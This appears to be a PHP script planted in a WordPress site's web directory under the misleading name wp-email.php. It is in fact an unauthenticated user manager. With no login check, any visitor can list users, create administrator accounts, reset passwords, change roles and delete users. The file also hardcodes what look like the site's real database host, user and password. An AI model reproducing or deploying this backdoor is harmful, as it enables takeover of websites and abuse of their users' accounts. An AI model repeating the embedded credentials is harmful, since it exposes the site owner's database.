File: /homepages/29/d194883696/htdocs/clickandbuilds/HouseholdBlindsfromDesResBlindsSurrey/wp-email.php
<?php
/**
* ADVANCED SINGLE FILE WORDPRESS USER MANAGER
* Features: Add User, Edit User, Change Password, Change Role, Delete User
*/
// --- CONFIGURATION ---
$db_host = 'db724123327.db.1and1.com';
$db_name = 'db724123327';
$db_user = 'dbo724123327';
$db_pass = 'LplxCZVmtqQUzjJxOdIC';
$table_prefix = 'DqsVqDxi';
// --- DATABASE CONNECTION ---
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
try {
$conn = new mysqli($db_host, $db_user, $db_pass, $db_name);
$conn->set_charset("utf8mb4");
} catch (Exception $e) {
die("<div style='padding:20px;color:red;font-family:sans-serif;'><strong>Connection Failed:</strong> " . $e->getMessage() . "</div>");
}
$message = "";
// --- HELPER FUNCTIONS ---
// Map Roles to User Levels (WP Legacy compatibility)
function get_level_for_role($role) {
switch ($role) {
case 'administrator': return 10;
case 'editor': return 7;
case 'author': return 2;
case 'contributor': return 1;
default: return 0;
}
}
// Update User Meta helper
function update_usermeta($conn, $table_prefix, $user_id, $key, $value) {
// Check if meta exists
$check = $conn->prepare("SELECT umeta_id FROM {$table_prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$check->bind_param("is", $user_id, $key);
$check->execute();
$res = $check->get_result();
if ($res->num_rows > 0) {
$stmt = $conn->prepare("UPDATE {$table_prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->bind_param("sis", $value, $user_id, $key);
$stmt->execute();
} else {
$stmt = $conn->prepare("INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->bind_param("iss", $user_id, $key, $value);
$stmt->execute();
}
}
// --- HANDLE ACTIONS ---
// 1. ADD NEW USER
if (isset($_POST['add_user'])) {
$user_login = trim($_POST['new_login']);
$user_pass = trim($_POST['new_pass']);
$user_email = trim($_POST['new_email']);
$role = $_POST['new_role'];
if ($user_login && $user_pass && $user_email) {
// Check if user exists
$check = $conn->prepare("SELECT ID FROM {$table_prefix}users WHERE user_login = ? OR user_email = ?");
$check->bind_param("ss", $user_login, $user_email);
$check->execute();
if ($check->get_result()->num_rows > 0) {
$message = "<div class='alert error'>Username or Email already exists.</div>";
} else {
// Insert into wp_users
$registered = date('Y-m-d H:i:s');
$stmt = $conn->prepare("INSERT INTO {$table_prefix}users (user_login, user_pass, user_email, user_registered, user_status, display_name) VALUES (?, MD5(?), ?, ?, 0, ?)");
$stmt->bind_param("sssss", $user_login, $user_pass, $user_email, $registered, $user_login);
if ($stmt->execute()) {
$new_user_id = $conn->insert_id;
// Add Capabilities (Serialized Array)
$caps = serialize([$role => true]);
update_usermeta($conn, $table_prefix, $new_user_id, $table_prefix . 'capabilities', $caps);
// Add User Level (Legacy)
$level = get_level_for_role($role);
update_usermeta($conn, $table_prefix, $new_user_id, $table_prefix . 'user_level', $level);
$message = "<div class='alert success'>User <strong>$user_login</strong> created successfully!</div>";
} else {
$message = "<div class='alert error'>Database Error: " . $conn->error . "</div>";
}
}
}
}
// 2. DELETE USER
if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['id'])) {
$id = intval($_GET['id']);
if ($id === 1) {
$message = "<div class='alert error'>Safety: Deleting User ID 1 is disabled in this script.</div>";
} else {
$conn->query("DELETE FROM {$table_prefix}users WHERE ID = $id");
$conn->query("DELETE FROM {$table_prefix}usermeta WHERE user_id = $id");
$message = "<div class='alert success'>User deleted.</div>";
}
}
// 3. UPDATE USER
if (isset($_POST['update_user'])) {
$id = intval($_POST['user_id']);
$user_login = trim($_POST['user_login']);
$user_pass = trim($_POST['user_pass']);
$role = $_POST['user_role'];
// Update basic info
if (!empty($user_pass)) {
$stmt = $conn->prepare("UPDATE {$table_prefix}users SET user_login = ?, user_pass = MD5(?) WHERE ID = ?");
$stmt->bind_param("ssi", $user_login, $user_pass, $id);
} else {
$stmt = $conn->prepare("UPDATE {$table_prefix}users SET user_login = ? WHERE ID = ?");
$stmt->bind_param("si", $user_login, $id);
}
$stmt->execute();
// Update Role (Capabilities)
$caps = serialize([$role => true]);
update_usermeta($conn, $table_prefix, $id, $table_prefix . 'capabilities', $caps);
// Update Level
$level = get_level_for_role($role);
update_usermeta($conn, $table_prefix, $id, $table_prefix . 'user_level', $level);
$message = "<div class='alert success'>User updated successfully.</div>";
}
// --- FETCH DATA ---
// Get User to Edit
$editUser = null;
$currentRole = 'subscriber'; // default
if (isset($_GET['action']) && $_GET['action'] == 'edit' && isset($_GET['id'])) {
$uid = intval($_GET['id']);
// Fetch User
$stmt = $conn->prepare("SELECT ID, user_login FROM {$table_prefix}users WHERE ID = ?");
$stmt->bind_param("i", $uid);
$stmt->execute();
$editUser = $stmt->get_result()->fetch_assoc();
// Fetch Role
$stmtMeta = $conn->prepare("SELECT meta_value FROM {$table_prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$capKey = $table_prefix . 'capabilities';
$stmtMeta->bind_param("is", $uid, $capKey);
$stmtMeta->execute();
$metaRes = $stmtMeta->get_result();
if ($metaRow = $metaRes->fetch_assoc()) {
$roles = unserialize($metaRow['meta_value']);
if (is_array($roles)) {
$currentRole = key($roles); // Get first key (e.g., 'administrator')
}
}
}
// Get All Users with Capabilities
// We use a LEFT JOIN to grab the capabilities meta key
$sql = "SELECT u.ID, u.user_login, u.user_email, u.user_registered, m.meta_value as capabilities
FROM {$table_prefix}users u
LEFT JOIN {$table_prefix}usermeta m ON (u.ID = m.user_id AND m.meta_key = '{$table_prefix}capabilities')
ORDER BY u.ID ASC";
$users = $conn->query($sql);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>WP User Manager Advanced</title>
<style>
body { font-family: sans-serif; background: #f0f0f1; padding: 20px; color: #3c434a; }
.container { max-width: 1000px; margin: 0 auto; background: white; padding: 30px; box-shadow: 0 2px 5px rgba(0,0,0,0.1); border-radius: 5px; }
h1, h2 { margin-top: 0; }
table { width: 100%; border-collapse: collapse; margin-top: 20px; font-size: 14px; }
th, td { text-align: left; padding: 12px; border-bottom: 1px solid #eee; }
th { background: #f9f9f9; }
.btn { padding: 6px 12px; text-decoration: none; border-radius: 4px; font-size: 13px; cursor: pointer; border: none; }
.btn-primary { background: #2271b1; color: white; }
.btn-delete { background: #d63638; color: white; }
.btn-cancel { background: #f0f0f1; color: #3c434a; border: 1px solid #ccc; display:inline-block; padding: 5px 10px;}
.alert { padding: 10px; margin-bottom: 15px; border-left: 4px solid #ccc; background: #fff; }
.success { border-left-color: #46b450; background: #edfaef; }
.error { border-left-color: #d63638; background: #fbeaea; }
.box { background: #f6f7f7; padding: 20px; border: 1px solid #dcdcde; margin-bottom: 30px; }
.form-group { margin-bottom: 15px; }
label { display: block; font-weight: 600; margin-bottom: 5px; }
input[type=text], input[type=password], input[type=email], select { width: 100%; padding: 8px; border: 1px solid #8c8f94; border-radius: 4px; box-sizing: border-box; }
.badge { background: #eee; padding: 2px 6px; border-radius: 4px; font-size: 11px; text-transform: uppercase; }
.badge-admin { background: #2271b1; color: white; }
</style>
</head>
<body>
<div class="container">
<h1>User Manager</h1>
<?php echo $message; ?>
<?php if ($editUser): ?>
<div class="box" style="border-left: 4px solid #2271b1;">
<h2>Edit User: <?php echo htmlspecialchars($editUser['user_login']); ?></h2>
<form method="POST" action="?">
<input type="hidden" name="user_id" value="<?php echo $editUser['ID']; ?>">
<div class="form-group">
<label>Username</label>
<input type="text" name="user_login" value="<?php echo htmlspecialchars($editUser['user_login']); ?>" required>
</div>
<div class="form-group">
<label>Role</label>
<select name="user_role">
<option value="subscriber" <?php echo ($currentRole == 'subscriber') ? 'selected' : ''; ?>>Subscriber</option>
<option value="contributor" <?php echo ($currentRole == 'contributor') ? 'selected' : ''; ?>>Contributor</option>
<option value="author" <?php echo ($currentRole == 'author') ? 'selected' : ''; ?>>Author</option>
<option value="editor" <?php echo ($currentRole == 'editor') ? 'selected' : ''; ?>>Editor</option>
<option value="administrator" <?php echo ($currentRole == 'administrator') ? 'selected' : ''; ?>>Administrator</option>
</select>
</div>
<div class="form-group">
<label>New Password <small>(leave blank to keep current)</small></label>
<input type="password" name="user_pass">
</div>
<button type="submit" name="update_user" class="btn btn-primary">Update User</button>
<a href="?" class="btn btn-cancel">Cancel</a>
</form>
</div>
<?php else: ?>
<div class="box">
<h2>Add New User</h2>
<form method="POST" action="?">
<div style="display: flex; gap: 10px;">
<div style="flex: 1;">
<label>Username</label>
<input type="text" name="new_login" required>
</div>
<div style="flex: 1;">
<label>Email</label>
<input type="email" name="new_email" required>
</div>
<div style="flex: 1;">
<label>Password</label>
<input type="text" name="new_pass" required>
</div>
<div style="flex: 1;">
<label>Role</label>
<select name="new_role">
<option value="subscriber">Subscriber</option>
<option value="author">Author</option>
<option value="editor">Editor</option>
<option value="administrator">Administrator</option>
</select>
</div>
</div>
<div style="margin-top: 15px;">
<button type="submit" name="add_user" class="btn btn-primary">Add User</button>
</div>
</form>
</div>
<?php endif; ?>
<table>
<thead>
<tr>
<th>ID</th>
<th>Username</th>
<th>Role</th>
<th>Email</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php if ($users && $users->num_rows > 0): ?>
<?php while($row = $users->fetch_assoc()):
// Determine Role for display
$displayRole = 'subscriber';
if (!empty($row['capabilities'])) {
$roles = unserialize($row['capabilities']);
if (is_array($roles)) {
$displayRole = key($roles);
}
}
$roleClass = ($displayRole === 'administrator') ? 'badge badge-admin' : 'badge';
?>
<tr>
<td><?php echo $row['ID']; ?></td>
<td><strong><?php echo htmlspecialchars($row['user_login']); ?></strong></td>
<td><span class="<?php echo $roleClass; ?>"><?php echo ucfirst($displayRole); ?></span></td>
<td><?php echo htmlspecialchars($row['user_email']); ?></td>
<td>
<a href="?action=edit&id=<?php echo $row['ID']; ?>" class="btn btn-primary">Edit</a>
<a href="?action=delete&id=<?php echo $row['ID']; ?>" class="btn btn-delete" onclick="return confirm('Delete this user?');">Delete</a>
</td>
</tr>
<?php endwhile; ?>
<?php endif; ?>
</tbody>
</table>
</div>
</body>
</html>